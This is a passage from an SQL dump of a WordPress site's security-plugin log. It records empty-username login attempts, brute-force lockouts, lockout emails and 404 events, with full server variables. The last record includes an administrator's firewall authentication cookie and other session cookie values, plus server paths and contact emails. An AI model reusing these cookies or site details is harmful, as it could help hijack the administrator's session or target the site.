attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:41:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:41:11\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:41:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:41:11\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:41:12','2019-09-21 15:41:11',27653560,29122416,'https://bintara.com.my/2019/wp-login.php',1,0,'178.62.76.138'),(26735,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:41:12','2019-09-21 15:41:11',28014544,29122416,'https://bintara.com.my/2019/wp-login.php',1,0,'178.62.76.138'),(26736,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=b68b946cb18f4351e59d5a297e2cb613\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZEq7fBTP0kPOVnb8j0YgAAAFc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"107.189.3.126\";s:11:\"REMOTE_PORT\";s:5:\"42800\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZEq7fBTP0kPOVnb8j0YgAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080491.1209\";s:12:\"REQUEST_TIME\";s:10:\"1569080491\";}}','notice','2019-09-21 15:41:33','2019-09-21 15:41:31',27571680,29123968,'https://bintara.com.my/2019/wp-login.php',1,0,'107.189.3.126'),(26737,0,'lockout','host-lockout::107.189.3.126','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"107.189.3.126\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:41:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:41:31\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:41:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:41:31\";s:12:\"lockout_host\";s:13:\"107.189.3.126\";}','action','2019-09-21 15:41:33','2019-09-21 15:41:31',27653968,29123968,'https://bintara.com.my/2019/wp-login.php',1,0,'107.189.3.126'),(26738,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"107.189.3.126\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:41:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:41:31\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:41:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:41:31\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:41:33','2019-09-21 15:41:31',27653976,29123968,'https://bintara.com.my/2019/wp-login.php',1,0,'107.189.3.126'),(26739,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:41:33','2019-09-21 15:41:31',28016120,29123968,'https://bintara.com.my/2019/wp-login.php',1,0,'107.189.3.126'),(26740,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=ca73ebedba452b0d28379a0c71c1843f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZEtEnlR@6WyRVzpiDwPQAAAAo\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"59.152.241.38\";s:11:\"REMOTE_PORT\";s:5:\"56920\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZEtEnlR@6WyRVzpiDwPQAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080500.3318\";s:12:\"REQUEST_TIME\";s:10:\"1569080500\";}}','notice','2019-09-21 15:41:41','2019-09-21 15:41:40',27577904,29128400,'https://bintara.com.my/blog/wp-login.php',1,0,'59.152.241.38'),(26741,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:41:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:41:40\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:41:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:41:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:41:41','2019-09-21 15:41:40',27659336,29128400,'https://bintara.com.my/blog/wp-login.php',1,0,'59.152.241.38'),(26742,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:41:41','2019-09-21 15:41:40',28020152,29128400,'https://bintara.com.my/blog/wp-login.php',1,0,'59.152.241.38'),(26743,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=0839e206c572fde8c829ad28cff145d7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZEyzDrcQxTmGrCWuaYDgAAAdY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"64.19.194.202\";s:11:\"REMOTE_PORT\";s:5:\"49662\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZEyzDrcQxTmGrCWuaYDgAAAdY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569080523.546\";s:12:\"REQUEST_TIME\";s:10:\"1569080523\";}}','notice','2019-09-21 15:42:05','2019-09-21 15:42:04',29356080,30910952,'https://bintara.com.my/wp/wp-login.php',1,0,'64.19.194.202'),(26744,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:42:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:42:04\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:42:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:42:04\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:42:05','2019-09-21 15:42:04',29437704,30910952,'https://bintara.com.my/wp/wp-login.php',1,0,'64.19.194.202'),(26745,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:42:05','2019-09-21 15:42:04',29798296,30910952,'https://bintara.com.my/wp/wp-login.php',1,0,'64.19.194.202'),(26746,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_CACHE_CONTROL\";s:14:\"max-age=259200\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"99.192.213.176\";s:11:\"REMOTE_PORT\";s:5:\"49516\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZG8rfBTP0kPOVnb8j0pgAAAFg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569081074.4828\";s:12:\"REQUEST_TIME\";s:10:\"1569081074\";}}','notice','2019-09-21 15:51:17','2019-09-21 15:51:14',31183808,32994200,'https://bintara.com.my/?page_id=18',1,0,'99.192.213.176'),(26747,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=3770496687dbab748a12655c4e167b63\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZITUnlR@6WyRVzpiDz5AAAABY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"111.90.140.100\";s:11:\"REMOTE_PORT\";s:5:\"50464\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZITUnlR@6WyRVzpiDz5AAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569081421.5844\";s:12:\"REQUEST_TIME\";s:10:\"1569081421\";}}','notice','2019-09-21 15:57:03','2019-09-21 15:57:01',31157232,32682928,'https://bintara.com.my/wp/wp-login.php',1,0,'111.90.140.100'),(26748,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:57:01\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:57:01\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:57:01\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:57:01\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:57:03','2019-09-21 15:57:01',31238664,32682928,'https://bintara.com.my/wp/wp-login.php',1,0,'111.90.140.100'),(26749,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:57:03','2019-09-21 15:57:01',31861832,32682928,'https://bintara.com.my/wp/wp-login.php',1,0,'111.90.140.100'),(26750,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:67:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:119:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/network/admin.php?page=itsec&module_type=recommended&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:3:\"0-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"en-GB,en-US;q=0.9,en;q=0.8,ms;q=0.7\";s:11:\"HTTP_COOKIE\";s:367:\"wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C5a7eb2dbbd5135c4abaf789cb6fe892ffcb7da479e43228c16fe327acfb46940; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569072852; icwp-wpsf=198b1f53e9059ccdc4c959fb4526ed72\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:14:\"HTTP_SAVE_DATA\";s:2:\"on\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Linux; Android 9; EML-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.73 Mobile Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:3:\"0-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYZJLUnlR@6WyRVzpiD0lgAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI